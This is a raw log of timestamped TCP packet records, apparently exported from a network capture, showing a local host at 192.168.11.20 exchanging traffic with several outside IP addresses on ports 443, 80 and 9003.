                                                    Sep 17, 2024 03:59:47.163841009 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.163881063 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.163887024 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.163997889 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.163997889 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.164056063 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.164335966 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.164344072 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.164478064 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.164515018 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.164567947 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.164798975 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.164803982 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.164808989 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.164935112 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.165038109 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.165184021 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.165364027 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.165430069 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.165642023 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.165714979 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.165884018 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.165977955 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.166196108 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.166385889 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.166548014 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.166598082 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.166604996 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.166740894 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.166742086 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.166747093 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.166909933 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.167051077 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.167321920 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.167329073 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.167391062 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.167481899 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.167489052 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.167572975 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.167679071 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.167911053 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.167916059 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.168049097 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.168066978 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.168071985 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.168267965 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.168601036 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.168834925 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.169295073 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.169576883 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.169588089 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.169595003 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.169749975 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.169807911 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.170061111 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.170433044 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.170567036 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.170744896 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.177308083 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.177982092 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.178905964 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.179275036 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.183130980 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.183291912 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.183361053 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.183582067 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.183640957 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.183648109 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.183871984 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.183969975 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.183976889 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.184108973 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.184573889 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.184775114 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.185019016 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.185180902 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.185200930 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.185372114 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.185775995 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.185812950 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.185818911 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.186072111 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.186300039 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.186463118 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.186671019 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.186887980 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.187014103 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.187321901 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.187321901 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.187321901 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.187330961 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.187525034 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.187630892 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.187800884 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.188409090 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.188636065 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.188642979 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.188647985 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.188842058 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.188946009 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.188954115 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.189023972 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.189153910 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.189347982 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.189629078 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.189771891 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.189970970 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.190695047 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.190967083 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.191210985 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.191338062 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.191427946 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.191576004 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.191752911 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.192003965 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.192157030 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.192306995 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.192464113 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.192625046 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.192699909 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.192820072 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.192961931 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.193298101 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.193587065 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.193888903 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.194015980 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.194067001 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.194880009 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.195199966 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.195523977 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.196219921 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.196219921 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.196966887 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.197277069 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.197526932 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.197719097 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.197758913 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.198261976 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.198569059 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.198631048 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.198637962 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.198695898 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.198851109 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.198873997 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.199038029 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.199060917 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.199163914 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.199170113 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.199222088 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.199372053 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.199378014 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.199450016 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.199589968 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.199657917 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.199662924 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.199812889 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.200087070 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.200341940 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.200349092 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.200521946 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.200787067 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.200985909 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.200985909 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.200985909 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.200994015 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.201270103 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.201297045 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.201549053 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.202109098 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.202305079 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.203136921 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.203416109 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.203454971 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.203459978 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.203528881 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.203597069 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.203613997 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.203654051 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.203675032 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.203766108 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.203771114 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.203877926 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.203882933 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.204032898 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.204066992 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.204073906 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.204210997 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.204216957 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.204245090 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.204260111 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.204266071 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.204338074 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.204338074 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.204436064 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.204519987 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.204524994 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.204571009 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.204611063 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.204617023 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.204674959 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.204679012 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.204752922 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.204840899 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.204868078 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.204911947 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.204916954 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.205004930 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.205085993 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.205104113 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.205137014 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.205220938 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.205226898 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.205270052 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.205316067 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.205338955 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.205429077 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.205431938 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.205487013 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.205547094 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.205553055 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.205598116 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.205604076 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.205662966 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.205678940 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.205766916 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.205825090 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.205883980 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.205888987 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.205995083 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.206067085 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.206223011 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.206228018 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.206274033 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.206279039 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.206378937 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.206386089 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.206525087 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.206561089 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.206567049 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.206613064 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.206947088 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.207251072 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.207251072 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.207251072 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.207258940 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.207263947 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.207298994 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.207298994 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.207406044 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.207411051 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.207523108 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.207529068 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.207601070 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.207706928 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.207731962 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.207736969 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.207901955 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.207938910 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.207943916 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.208071947 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.208185911 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.208193064 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.208288908 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.208304882 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.208453894 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.208523989 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.208523989 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.208528996 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.208601952 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.208736897 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.208827972 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.208836079 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.208841085 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.208899975 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.208992958 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.209017992 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.209022999 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.209177971 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.209449053 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.209695101 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.209695101 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.209695101 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.209702969 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.209709883 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.209744930 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.209744930 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.209744930 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.209928036 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.209933996 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.210131884 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.210135937 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.210239887 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.210246086 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.210448980 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.210474014 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.210479021 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.210644960 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.210650921 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.210786104 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.210792065 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.210887909 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.210902929 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.210907936 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.210994005 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.211137056 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.214538097 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:57.927118063 CEST49760443192.168.11.20142.202.242.43
                                                    Sep 17, 2024 03:59:57.927139044 CEST44349760142.202.242.43192.168.11.20
                                                    Sep 17, 2024 03:59:57.927323103 CEST49760443192.168.11.20142.202.242.43
                                                    Sep 17, 2024 03:59:57.927704096 CEST49760443192.168.11.20142.202.242.43
                                                    Sep 17, 2024 03:59:57.927715063 CEST44349760142.202.242.43192.168.11.20
                                                    Sep 17, 2024 03:59:58.235100031 CEST44349760142.202.242.43192.168.11.20
                                                    Sep 17, 2024 03:59:58.236254930 CEST49760443192.168.11.20142.202.242.43
                                                    Sep 17, 2024 03:59:58.236267090 CEST44349760142.202.242.43192.168.11.20
                                                    Sep 17, 2024 03:59:58.237525940 CEST44349760142.202.242.43192.168.11.20
                                                    Sep 17, 2024 03:59:58.237726927 CEST49760443192.168.11.20142.202.242.43
                                                    Sep 17, 2024 03:59:58.238897085 CEST49760443192.168.11.20142.202.242.43
                                                    Sep 17, 2024 03:59:58.239017010 CEST44349760142.202.242.43192.168.11.20
                                                    Sep 17, 2024 03:59:58.292735100 CEST49760443192.168.11.20142.202.242.43
                                                    Sep 17, 2024 03:59:58.292746067 CEST44349760142.202.242.43192.168.11.20
                                                    Sep 17, 2024 03:59:58.344310999 CEST49760443192.168.11.20142.202.242.43
                                                    Sep 17, 2024 03:59:58.529988050 CEST44349760142.202.242.43192.168.11.20
                                                    Sep 17, 2024 03:59:58.574002028 CEST49760443192.168.11.20142.202.242.43
                                                    Sep 17, 2024 03:59:58.577655077 CEST4976180192.168.11.20104.16.185.241
                                                    Sep 17, 2024 03:59:58.672204018 CEST8049761104.16.185.241192.168.11.20
                                                    Sep 17, 2024 03:59:58.672348022 CEST4976180192.168.11.20104.16.185.241
                                                    Sep 17, 2024 03:59:58.672451973 CEST4976180192.168.11.20104.16.185.241
                                                    Sep 17, 2024 03:59:58.767131090 CEST8049761104.16.185.241192.168.11.20
                                                    Sep 17, 2024 03:59:58.777120113 CEST8049761104.16.185.241192.168.11.20
                                                    Sep 17, 2024 03:59:58.824172974 CEST4976180192.168.11.20104.16.185.241
                                                    Sep 17, 2024 04:00:01.082062006 CEST44349760142.202.242.43192.168.11.20
                                                    Sep 17, 2024 04:00:01.135895014 CEST49760443192.168.11.20142.202.242.43
                                                    Sep 17, 2024 04:00:05.830723047 CEST497629003192.168.11.2089.23.100.233
